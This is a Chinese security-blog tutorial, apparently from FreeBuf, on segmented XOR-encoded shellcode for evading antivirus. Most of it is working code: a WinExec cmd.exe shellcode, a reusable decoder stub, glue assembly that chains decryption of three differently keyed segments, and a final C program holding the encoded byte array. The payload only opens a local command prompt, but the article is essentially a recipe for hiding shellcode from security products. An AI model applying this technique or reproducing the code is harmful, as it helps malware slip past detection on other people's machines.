FREEBUF媒体原创文章 https://www.freebuf.com/articles/system/228579.html
我们在写shellcode时候,做分段免杀执行时,如何做到边解码然后执行再调用解码,解码后再执行?就是分段执行而且解密的密钥是不一样的,对于这个问题,我们应该想想这三个问题。
- 1、如何写出通用的解码子?
- 2、如何才能调到解码子的解码部分首地址?
- 3、如何才能跳到刚解码的shellcode首地址?
复制代码
这三个问题想明白了,就能实现了
下面我们利用xor用不同秘钥加密弹出cmd程序来说明
0×00写出我们的程序- #include "stdio.h"
- #include "windows.h"
- #include <string.h>
- #include "stdlib.h"
- int main(int argc, char* argv[])
- {
- char *str="cmd.exe";
- __asm{
- mov eax,str
- push 5 ;5=SW_SHOW
- push eax
- mov eax,0x7731dab0
- //0x7731dab0
- //call dword ptr [WinExec]
- call eax
- }
- return 0;
- }
复制代码 0x7731dab0是winexec函数地址
0×01 转成shellcode形式- #include "stdio.h"
- #include "windows.h"
- #include <string.h>
- #include "stdlib.h"
- char shellcode[]="\x8B\x45\xFc\x6A\x05\x50\xB8\xB0\xDA\x50\x75\xFF\xD0";
- int main(int argc, char* argv[])
- {
- char *str="cmd.exe";
- __asm{
- lea eax,shellcode
- call eax
- }
- return 0;
- }
复制代码
运行看一下能不能执行 0×02 xor加密我们用三个秘钥对上面的shellcode加密,值分别为0×51,0×47,0×81,根据秘钥个数对shellcode分段,分成三段,0×51对对\x8B\x45\xFc加密,0×47对\x6A\x05\x50\xB8\xB0\xDA\x50\x75加密,0×81对\xFF\xD0加密(一条语句的机器码不能分开),在每段后面加上\x90,加个\x90是控制解密的个数,这样我们可以想解密到哪里就解密到哪里,加密后的shellcode为 \xda\x14\xad\xc1 \x2d\x42\x17\xff\xf7\x9d\x17\x32\xd7 \x7e\x51\x11 0×03 写出通用的解码子- decode: mov bl,byte ptr ds:[ecx+edx]
- xor bl,bh
- mov byte ptr ds:[ecx+edx],bl
- inc edx
- cmp bl,90h
- je execute
- jmp decode
- execute:
- add ecx,edx //ecx加上解码的数目
- ret
复制代码利用bh存储秘钥,通过解密出来的bl和90h比较来,如果解密出来是90h,停止解密,跳到execte出执行,最后返回,这里必须要用ret,因为这段程序要放到我们加密的shellcode前面,如果没有ret,程序将去执行shellcode,而后面还有shellocde将不会解密,我们要分段执行,所以解密之后我们还要回到原来调用解密的地方,便于后面的操作。 找出下面这段程序机器码放在第一段shellcode之前 - __asm{
- xor edx,edx
- mov bh,51h //bh存储key
- decode: mov bl,byte ptr ds:[ecx+edx]
- xor bl,bh
- mov byte ptr ds:[ecx+edx],bl
- inc edx
- cmp bl,90h
- je execute
- jmp decode
- execute:
- add ecx,edx //ecx加上解码的数目
- ret
- }
复制代码 0×04 逻辑处理语句这里的逻辑处理语句是放在每段shellcode之间,做到存储和取解码子的解码部分首地址,跳到刚解码的shellcode首地址的功能,并且能够修改秘钥值。 - __asm{
- push edx //将decode首地址也入栈
- add ecx,19 //这个是让ecx的值等于下一个shellcdoe首地址
-
- push ecx //下一个shellcode首地址压入栈
- push eax //将eax压入栈中(因为我们执行的代码中利用eax进行,eax值不能变)
- mov eax,edx //将decode首地址传给eax
- xor edx,edx
- mov bh,47h //第二段key,各段shellcode的key不同,要修改
- call eax
- pop eax
- pop ebx //shellcode首地址
- pop edx //decode首地址
- jmp ebx //到shellcode出执行
- }
复制代码每次执行完解码后的shellcode都会来执行这段语句,edx存放解码子的首地址,call eax会去解码,jmp ebx会去执行解码后的shellcode。从上面的代码解决了如何才能调到解码子的解码部分首地址的问题,通过一开始找到解码的首地址,压入栈,然后每次解码完,都弹出来给一个寄存器,执行完解码就去执行shellcode,执行完shellcode根据弹出来的解码首地址,再去解码。 找出这段程序机器码放在每段shellcode之间 0×05 定位shellcode首地址分段解密执行,我们知道各段shellcode的首地址是不同的,怎么才能够找到能各段的shellcode首地址呢? 解密前,我们把下一个要解密的shellcode首地址压入栈,在执行call eax时,ecx的值是下一个要执行shellcode的首地址,解码子里有add ecx,edx,所以解码完ecx是下一个要执行的shellcode的尾地址再加1,再执行add ecx,19,19是逻辑处理那段的机器码数目,之后ecx就是下下个要执行的shllcode首地址,再通过出栈压栈,我们都能找到要执行shllcode首地址 0×06 最终程序- #include "stdio.h"
- #include "windows.h"
- #include <string.h>
- #include "stdlib.h"
- unsigned char encode[]="\x33\xD2\xB7\x51\x3E\x8A\x1C\x11\x32\xDF\x3E\x88\x1C\x11\x42\x80\xFB\x90\x74\x02\xEB\xEE\x03\xCA\xC3"
- "\xda\x14\xad\xc1"
- "\x52\x83\xC1\x13\x51\x50\x8B\xC2\x33\xD2\xB7\x47\xFF\xD0\x58\x5B\x5A\xFF\xE3"
- "\x2d\x42\x17\xff\xf7\x9d\x76\x30\xd7"
- "\x52\x83\xC1\x13\x51\x50\x8B\xC2\x33\xD2\xB7\x81\xFF\xD0\x58\x5B\x5A\xFF\xE3"
- "\x7e\x51\x11";
- int main(int argc, char* argv[])
- {
- char *str="cmd.exe";
-
- __asm{
- lea ecx,encode //获取encode+shellcode编码的地址
- mov edx,ecx
- add ecx,25 //ecx存储第一个shellcode首地址,从xor edx,edx到ret,这段的机器码
- push ecx //第一个shellcode压入站首地址
- sub ecx,21 //解码decode首地址,21第一个shellcode到解码的机器码数
- push ecx //压入栈
- add ecx,21
- call edx //解码
- pop edx //解码首地址
- pop ebx //第一个shellccode首地址
- jmp ebx
- }
- return 0;
- }
复制代码 结果:
程序在开始时候,就把第一段shellcode首地址和解码子首地址压入栈,接着调用解码程序去解码第一段shellcode,解码完返回,接着弹出第一段shellcode首地址和解码子首地址,利用jmp去执行解码后的第一段shellcode,执行完,去执行0×04内容,根据弹出来的解码子首地址,再去解码第二段shellcode,然后执行,依次类推
0×07 总结1、解码执行第二段代码的密钥在第一段里面 2、利用好ret,解码后返回 3、多利用push,pop,比如shllcode首地址和解码子首地址的入栈、出栈
|